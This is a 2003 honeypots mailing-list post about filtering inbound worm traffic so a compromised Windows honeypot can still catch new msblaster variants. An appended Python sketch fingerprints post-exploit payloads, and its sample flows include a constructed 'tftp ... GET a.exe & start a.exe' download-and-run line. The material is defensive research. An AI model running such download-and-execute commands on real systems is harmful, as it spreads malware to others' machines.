Honeypots mailing list archives
Filtering traffic for variants
From: <shrink-wrap () hushmail com>
Date: 18 Aug 2003 16:58:35 -0000
Hi,

Since this has been a problem for me lately, I was wondering if anyone on this list might have some insight on this issue. The problem is that I want to weed out the known bad traffic from the unknown bad traffic as it comes inbound. An example is in order:

- Windows 2k honeypot
- SP4 patched
- no RPC DCOM patch
- gets compromised by msblaster/lovesan (variant A)
- traffic filtered (per control requirement) outbound
- variant B comes along and can't infect because of previous activity (actively filtered or, eventually, honeypot patched [to stop variant A, i.e. waste of time])

With this example it isn't easy to use snort-inline, since the exploits used in the worm and its variants are the same (thus the signatures that will fire are the same). And this problem is the same with any worm (at least) - IIS ISAPI .printer vulnerability ;)

Obviously GenI controls don't handle this type of problem, since the control (normally a firewall) isn't very dynamic, while GenII normally doesn't filter incoming - it processes outgoing (for a good reason). Has anyone set up something to do this?

S-W
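One way to get the "known bad vs. unknown bad" split the post asks for is to stop keying the inbound filter on the exploit signature (identical across variants) and key it instead on what follows the exploit: the worm-specific second stage. The sketch below is an added example, not code from the poster or from snort-inline. It assumes, hypothetically, that the shared exploit portion of a flow can be located by a fixed byte marker (EXPLOIT_MARKER) and that the bytes after it are the variant-specific stage; the sample flows are constructed, not captures.

```python
"""Inbound "known variant" suppressor for a honeypot (added example).

Idea: an IDS signature fires identically for variant A and variant B because
the exploit is the same.  So fingerprint only the bytes *after* the exploit
stub.  Once the operator has captured and analysed a variant, flows carrying
that fingerprint are dropped inbound; flows with a new fingerprint (an unknown
variant) are still allowed to reach and infect the honeypot.
"""
import hashlib

# Hypothetical stand-in for the bytes an IDS signature keys on.  Every variant
# carries the same exploit, so this marker alone cannot tell variants apart.
EXPLOIT_MARKER = b"<EXPLOIT-STUB>"


class VariantFilter:
    """Decide pass/drop for an inbound flow based on the post-exploit stage."""

    def __init__(self):
        self.known = {}         # fingerprint -> operator label (already captured)
        self.seen_unknown = {}  # fingerprint -> first payload allowed through

    @staticmethod
    def fingerprint(payload: bytes):
        """Hash only the bytes after the shared exploit stub.

        Returns None for traffic that does not carry the exploit at all."""
        idx = payload.find(EXPLOIT_MARKER)
        if idx < 0:
            return None
        stage2 = payload[idx + len(EXPLOIT_MARKER):]
        return hashlib.sha256(stage2).hexdigest()[:16]

    def decide(self, payload: bytes) -> str:
        fp = self.fingerprint(payload)
        if fp is None:
            return "pass"       # not exploit traffic; none of our business here
        if fp in self.known:
            return "drop"       # variant already captured: would only re-infect
        self.seen_unknown.setdefault(fp, payload)
        return "pass"           # unknown variant: let it reach the honeypot

    def mark_known(self, payload: bytes, label: str) -> None:
        """Operator call once the honeypot has been compromised and imaged."""
        fp = self.fingerprint(payload)
        if fp is not None:
            self.known[fp] = label


# Constructed sample flows: same exploit stub, different second stage.
VARIANT_A = EXPLOIT_MARKER + b"tftp -i 10.0.0.1 GET a.exe & start a.exe"
VARIANT_B = EXPLOIT_MARKER + b"tftp -i 10.0.0.1 GET b.exe & start b.exe"
BENIGN = b"GET / HTTP/1.0\r\n\r\n"


def demo():
    """Walk the scenario from the post and return the filter's decisions."""
    f = VariantFilter()
    decisions = []
    decisions.append(f.decide(VARIANT_A))   # first sighting: pass, honeypot gets owned
    f.mark_known(VARIANT_A, "variant A")    # operator captures it, marks it known
    decisions.append(f.decide(VARIANT_A))   # same variant again: drop
    decisions.append(f.decide(VARIANT_B))   # same exploit, new stage: pass
    decisions.append(f.decide(BENIGN))      # no exploit at all: pass
    return decisions


if __name__ == "__main__":
    print(demo())
```

The hash is deliberately taken over the whole second stage, so any variant that changes even its fetch command or binary name gets a fresh fingerprint and is let in. The flip side is the caveat a practitioner should expect: a variant that randomises padding or the fetched filename per connection would look "new" every time and never be suppressed, so in practice the fingerprint would need to be normalised (e.g. strip the host and filename before hashing) at the cost of possibly lumping genuinely distinct variants together.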